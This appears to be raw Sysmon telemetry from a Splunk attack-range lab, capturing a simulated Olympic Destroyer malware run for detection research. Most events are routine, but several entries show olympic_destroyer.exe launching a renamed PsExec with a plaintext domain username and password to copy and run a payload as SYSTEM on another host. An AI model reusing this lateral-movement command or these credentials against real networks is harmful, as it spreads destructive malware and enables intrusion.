11:05:12.366{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:12.366{C8EA50B7-F2AD-6215-C000-000000003802}48566052C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\7-Zip\7-zip.dll+545c|C:\Program Files\7-Zip\7-zip.dll+67e5|C:\Program Files\7-Zip\7-zip.dll+6e16|C:\Program Files\7-Zip\7-zip.dll+8dde|C:\Program Files\7-Zip\7-zip.dll+c301|C:\Windows\System32\SHELL32.dll+80407|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\System32\SHELL32.dll+17c35c|C:\Windows\System32\SHELL32.dll+19eb28|C:\Windows\System32\SHELL32.dll+2846f3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17c600|C:\Windows\System32\SHELL32.dll+179a7e|C:\Windows\System32\SHELL32.dll+73861|C:\Windows\System32\SHELL32.dll+76746|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026 154100x8000000000000000295106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:12.367{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe21.077-Zip GUI7-ZipIgor Pavlov7zg.exe"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap26785:92:7zEvent5113 -ad -saa -- "C:\Users\Administrator\Downloads\Logfile"C:\Windows\system32\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=300B8E1F636DCDE7269EF18600493819,SHA256=3AEF7662DCDBBC952A3ECD3677DA943EF3D4AECB5BD624625B6B176B1B5CE617,IMPHASH=C60649CDE63EC51599F93CD2D0157322{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x8000000000000000219286Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:12.066{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=10CEF458C3CA8261AEDAC4F9B2DEBDCB,SHA256=20EA81404ECCF6EB07FC6AB763BCF92CA8D17F0D85EAB9C4E516EFC304B65689,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:13.953{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8365E67E23115043678633FBF427ABED,SHA256=C6F2DDDD0897B6E8354C2275394DE0FAA10142CDCDF6BCC033B3967CF0EE19A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:13.453{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:13.453{C8EA50B7-F2AD-6215-C000-000000003802}48566436C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:13.453{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:13.453{C8EA50B7-F2AD-6215-C000-000000003802}48566436C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:13.453{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:13.453{C8EA50B7-F2AD-6215-C000-000000003802}48566436C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:13.438{C8EA50B7-F2AD-6215-C000-000000003802}48566436C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:13.438{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:13.438{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:13.438{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:13.438{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:13.438{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:13.438{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219288Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:13.284{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F31A959CA02602A29E60F5081C174374,SHA256=4A6212164BC70B5AF439C0C190B1F969C05709EDCF8D3ADA7FF9C826E18E8EB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:14.971{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4DA9F4A91AA2A5F8D76BEDF57605B66,SHA256=8F4114BAF65BDC963CA03B43A8E9F3EF55227A6790B262144BA6AF1D050367FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219289Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:14.299{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60DC808E1F6483331317085ABF541C1F,SHA256=9CB94B7544CE1AD166EFA690F21FD3016F075E3EAF0C4FDD8FAD7C37625D3679,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219291Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:12.552{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx59465-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219290Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:15.346{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F10B093597C7E814BE3BCDADAB864667,SHA256=BF65385B5165A29138CE710196050237AF1B6B0D364C87C13C20BDCD9B90AF5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:15.837{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-14EB-6216-B406-000000003802}6332C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:15.837{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:15.837{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:15.837{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:15.837{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:15.837{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-14EB-6216-B406-000000003802}6332C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000295135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:15.838{C8EA50B7-14EB-6216-B406-000000003802}6332C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.15 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000295134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:15.837{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-14EB-6216-B406-000000003802}6332C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000295133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:15.821{C8EA50B7-14D1-6216-AC06-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 354300x8000000000000000219294Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:14.576{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51511-false10.0.1.12-8000- 23542300x8000000000000000219293Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:16.377{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB391614DC73D6648F2A8E05813518F7,SHA256=D6F11983383C9BAFCBB00C0FF5F812A70533F36971968F5248AC7AEA366C2579,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 